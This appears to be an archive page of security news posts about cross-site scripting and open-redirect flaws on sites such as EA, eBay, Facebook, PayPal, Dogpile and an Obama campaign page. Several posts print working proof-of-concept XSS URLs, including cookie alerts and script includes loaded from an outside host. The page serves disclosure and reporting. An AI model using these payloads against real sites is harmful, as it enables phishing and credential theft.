CyberInsecure.com

Archive for the ‘XSS’ Category

Over the last few months endless malware campaigns abused Google and DoubleClick redirect links in their spam. Clicking on such safe looking link will result a redirection to a malware hosting site and an infection of user’s Windows running machine.

Even though it took Google some time to close this redirection, the malware authors have successfully switched to Dogpile.com redirection vulnerability. Here is an example of Dogpile.com cross-site scripting vulnerablity that allows redirection of visitors who click a link originating from dogpile.com domain:

http://www.dogpile.com/clickserver/_iceUrlFlag=1?
rawURL=http://CNN.com&0=

It is safe clicking on this link, it will just redirect you to CNN.com. Malware authors are actively using this redirection to infect users by sending them confusing, safe looking links to exploit hosting sites. The sad thing about it is that another redirection vulnerability on Dogpile was discovered and reported back in Novermber 2007. It is still unfixed.

Google has done quite a bit to fix the redirection problem, Dogpile should aslo fix it soon (hopefully), but the party will just move on to a different location. A good example would be a redirection vulnerability on Devicelock.com, reported by XSSed and still unfixed.
DeviceLock, Inc. is a “worldwide leader in endpoint device control security” and on their website they offer a security solution that prevents unauthorized access to USB devices. They are proudly using a Content Managment System (CMS) called Bitrix and here is the redirection example on their website:

http://www.devicelock.com/bitrix/redirect.php?event1=
demo_out&event2=sm_demo&event3=pdemo&goto=http://CNN.com

Lets say an average user is receiving an email with a link like the one above. The email says that he is a winner of some free DeviceLock promotional product and all he needs to do to claim it is clicking that link. User clicks the link, being redirected to a malware hosting site and another Windows machine probably gets infected. Although the number of popular and trusted domains is limited, it seems malware spam techniques will contain various redirection links for a long time.

Multiple cross-site scripting (XSS) vulnerabilities threaten Electronic Arts (EA) gamers due to a flaw on EA main website and numerous sub domains which inlcude profile and customer support areas. Malicious users might initiate series of phishing attacks, spam fake links and use these flaws to steal sensitive personal data such as authentication and payment credentials, game account passwords and also infect PCs with malware.

Although EA’s is a TRUSTe (truste.org) certified customer, there are old unfixed flaws that were reported long ago. TRUSTe is an independent website privacy monitor and it’s seal supposed to assure EA users of safety and security of their personal data.

Vulnerable EA websites include:

ea.com: http://www.ea.com/official/godfather/godfather/us
/scripts/sound_js.inc?page=”><script>alert(’XSS’)</script>

ea.com #2: http://www.ea.com/prostreet/home.jsp?locale=
us%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

customersupport.ea.com: http://customersupport.ea.com/loginapp/login.do?
curl=”><script>alert(/xss/)</script>

profile.ea.com: https://profile.ea.com/login.do?
surl=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Cp

findgames.ea.com: http://findgames.ea.com/?
search=%22%3E%3Ciframe%20src=http://xssed.com%3E

thesims2.ea.com: http://thesims2.ea.com/exchange/
object_detail.php?hideFramework=%22%3E%3Cscript
%3Ealert(%22The%20Milk%20Man%22)%3C/script%3E
%3CMARQUEE%3E%3Cimg%20src=http://somesite.com/
somepic.jpg%3E%3C/marquee%3E

profile.ea.com: POST action=
linkcontinue&username=XSSED@XSSED.com&password=XSS&
cpassword=XSS&month=02&day=03&year=1990&country=BD&
language=0&globaloptin=&thirdpartyoptin=&HIDE_GUS=&
account=0&migrateusername=%5BLjava.lang. String%3B%
40676af&migratepassword=%5BLjava.lang.String
%3B%405a0e76&account=xbox&migrateusername=
%22% 2F%3E&migratepassword=&account=xbox&
migrateusername=%3C%2Fli%3E%3Ciframe+
src%3Dhttp%3A%2F%2Fgoogle.c om%3E%3C%2Fiframe%3E%3C
script+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
%3F%2F%3E&migratepassword=&acc ount=
0&migrateusername=&migratepassword=&account=0&
migrateusername=&migratepassword=

Based on reports from XSSed. Credit for the discovery and report of these vulnerabilities to XSSed: Shocker<-at->ShockingSoft.com, C1c4Tr1Z, mox, koolkeith12345, The Milk Man, x2Fusion, Arham Muhammad and Harry Sintonen.

Clarification (June 10): TRUSTe ensures certified privacy rather than protection against hacking or XSS. Consumers are able to rely on the TRUSTe certification and TRUSTe dispute resolution for any privacy issues they are having on websites that bear the TRUSTe seal. Security vulnerabilities fall outside the scope of what TRUSTe monitors.

According to XSSed report, eBay is vulnerable to cross-site scripting (XSS) that might be abused by scammers in order to take advantage of eBay users account. JavaScript code injection can redirect users to fake phishing pages where users are asked to login to their account. Victims who click on what appears to be a genuine eBay search results are also vulnerable to malware infection.

Among affected domains there are:

motors.desc.shop.ebay.com
shop.ebay.com
search.express.ebay.com
motors.shop.ebay.com

Last years cross-site scripting vulnerability on eBay could trick people into handing over their personal information to scammers. eBay promptly patched the flaw, but experts wondered how long the fix can hold. Previous flaw was exactly the same and allowed a scammer to use this type of attack to redirect people from an eBay listing to a spoofed eBay site. A year ago experts said that hackers can easily modify JavaScript code to once again trigger the same behavior and it seems they were right.

Here is the vulnerability example from XSSed:

<SCRIPT>if (top == window)location.href =’http://www.any-domain.com’</SCRIPT>

The XSS issues were submitted to XSSed by S_e_YM_e_N, Azat Harutyunyan, www.r3t.n3t.nl and Uber0n.

The vulnerability was already reported to eBay but currently remains unfixed.

According to XSSed, Facebook is vulnerable to a cross site scripting flaw that leaves its users at risk from scripting attacks and logins phishing. The security blog has posted a proof of concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third party sites.

Here is a harmless proof of concept, shown at XSSed:

http://www.facebook.com/jobs/position.php?st=
%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe
%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.facebook.com/jobs/position.php?st=
%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.

Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.

At this moment the flaw is still open. Facebook has been already notified of the vulnerability.

Update (May 27):  Facebook has fixed this vulnerability a couple of days ago.

A cross-site scripting vulnerability (XSS) has been found in PayPal, an online payment processing firm website. The vulnerability allows arbitrary code execution and could be used in a phishing attack to gather data from unsuspecting users.

The vulnerability allows a malicious attacker to construct a new page which will appear to be on the paypal.com domain name. This fraudulent page could imitate the PayPal login page and harvest account details. Attackers could carry out highly believable attacks by adding their own content to the site and misleading unsuspecting users.

According to Netcraft, the vulnerability is made worse by the fact that the affected page uses an Extended Validation SSL certificate, which causes the browser’s address bar to turn green, assuring visitors that the site belongs to PayPal. Two years ago, a similar vulnerability was discovered on a different page of the PayPal site, which also used an SSL certificate.

This vulnerability is discovered a month after PayPal published a new approach to managing phishing. Browsers that do not support EV certificates to be considered as unsafe and customers who access their website using unsafe browsers will be blocked.

The vulnerability has been reported to PayPal.

The application is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. The Internationalization module is also prone to cross-site request forgery attacks while performing node translations.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the cross-site request-forgery issue by tricking a victim into following a specially crafted HTTP request designed to perform some action on the attacker’s behalf using a victim’s currently active session. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The vendor has released updates.

Vulnerable:

Drupal Localizer 5.x 3.3
Drupal Localizer 5.x 2.x-dev
Drupal Localizer 5.x 1.10
Drupal Internationalization 6.x 1.x-dev
Drupal Internationalization 5.x 2.2
Drupal Internationalization 5.x 1.x-dev

Not Vulnerable:

Drupal Localizer 5.x 3.4
Drupal Localizer 5.x 2.1
Drupal Localizer 5.x 1.11
Drupal Internationalization 6.x 1.0-beta1
Drupal Internationalization 5.x 2.3
Drupal Internationalization 5.x 1.1

A cross-site scripting vulnerability in the social networking section of Sen. Barack Obama’s campaign site was exploited over the weekend to redirect users to the URL of his rival, Sen. Hillary Clinton. Cross-site scripting vulnerabilities, which are most commonly exploited by identity thieves and phishers, let attackers inject their own malicious code into legitimate pages. According to the U.K.-based anti-fraud company Netcraft Ltd., someone identified only as “Mox” confessed to the hack in an entry on the Community Blogs section on the Obama site Sunday. Obama, an Illinois Democrat, leads Clinton in the race for the party’s presidential nomination. The site exploit occurred just before this week’s big Pennsylvania primary.

An Obama supporter captured the cross-site scripting hack and the resulting redirect to Clinton’s campaign site on video Saturday, and posted it on YouTube. Clicking on the “Community Blogs” link, the video showed, sent users to hillaryclinton.com.

Additional vulnerabilities were spelled out by Dimitris Pagkalos, a 22-year-old security researcher who co-manages an online archive of sites vulnerable to cross-site scripting attacks. According to Pagkalos, Obama’s site harbors two still-unpatched bugs. Pagkalos also provided more detail on the redirect that Mox implemented over the weekend, noting that the attack used an IFRAME injected into the title parameter of a personal group, another social networking feature of the Obama site, that then let Mox remotely call some malicious JavaScript.

The bug, said Pagkalos, could have been used to infect Obama’s supporters and site visitors with malware, adware or identity-stealing spyware.

Obama’s campaign did not reply to a request for comment. The cross-site scripting bug has been patched.